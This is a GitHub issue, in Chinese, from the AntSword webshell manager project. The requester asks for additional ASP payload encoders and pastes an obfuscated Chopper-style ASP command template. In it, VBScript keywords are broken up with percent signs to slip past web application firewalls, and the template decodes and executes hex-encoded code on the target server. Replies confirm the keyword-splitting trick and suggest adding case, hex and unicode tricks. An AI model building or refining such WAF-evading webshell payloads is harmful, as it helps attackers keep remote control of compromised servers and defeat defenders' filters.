Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

新建议:增加asp的编码方式 #152

Closed
yzddmr6 opened this issue Apr 18, 2019 · 3 comments
Closed

新建议:增加asp的编码方式 #152

yzddmr6 opened this issue Apr 18, 2019 · 3 comments
Labels
💪enhancement 功能增强

Comments

@yzddmr6
Copy link
Member

yzddmr6 commented Apr 18, 2019

对于其他几种脚本来说其实蚁剑自带的编码器都挺好的
但是asp的仅有一种编码器并且是普通shell不能用的
default最普通的waf就会拦截
所以希望官方能够多增加几种编码方式
当然,作为用户来说可以自己写.但是这毕竟应该是大多数人的需求
如果官方能够增加编码方式的话大家用起来会更方便
其实也想自己改写,参考了一下菜刀的代码,但是对于nodejs确实不知道如何改成以下的形式
<ASP_BASE>
%%u0045%%xec%%ute%%G%%loba%%l%%%%28Replace%%28%%22Fu%%nct%%ion%%20bd%%28by%%V%%al%%20s%%29:Fo%%r%%20i%%%%3D1%%20T%%o%%20Le%%n%%28s%%29%%20S%%te%%p%%202:c%%%%3DM%%id%%28s%%2Ci%%2C2%%29:If%%20Is%%Nu%%meric%%28M%%id%%28s%%2Ci%%2C1%%29%%29%%20T%%hen:bd%%%%3Dbd%%4026%%40c%%hr%%28%%22%%22%%4026%%40H%%22%%22%%4026%%40c%%29:E%%lse:bd%%%%3Dbd%%4026%%40c%%hr%%28%%22%%22%%4026%%40H%%22%%22%%4026%%40c%%4026%%40M%%id%%28s%%2Ci%%2B2%%2C2%%29%%29:i%%%%3Di%%2B2:E%%nd%%20If:Ne%%xt:E%%nd%%20Fu%%nct%%ion:E%%xecu%%te%%%%28bd%%%%28%%22%%224F6E204572726F7220526573756D65204E6578743A526573706F6E73652E57726974652022%s223A%s3A526573706F6E73652E57726974652022%s223A526573706F6E73652E456E64%%22%%22%%29%%%%29%%22%%2C%%22%%4026%%40%%22%%2Cchr%%2838%%29%%29%%29
</ASP_BASE>

php的编码器写了不少,但是对于asp这种语言不太熟悉,所以希望官方能够推出一些编码器,或者给一些指点,感谢!

@Medicean Medicean added the 💪enhancement 功能增强 label Apr 19, 2019
@Medicean
Copy link
Collaborator

看你这个 payload, 应该是把几个关键字用 % 打散了,我这么理解对吧?

比如:

  • eval => e%v%a%l
  • Response => R%e%s%p%o%n%s%e

Medicean referenced this issue Apr 19, 2019
asunescape 括号中的内容在HTTP请求时,不会进行urlEncode
eg:

data["key1"] = "++asunescape(@@@)++";  => "key1=%3B%3B@@@%3B%3B"
@yzddmr6
Copy link
Member Author

yzddmr6 commented Apr 20, 2019

是的 还可以配合大小写 hex unicode编码等等

@yzddmr6
Copy link
Member Author

yzddmr6 commented Apr 20, 2019

可以参考菜刀的配置文件 但是菜刀的编码特征已经被很多waf识别了 可以自己魔改一下

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
💪enhancement 功能增强
Projects
None yet
Development

No branches or pull requests

2 participants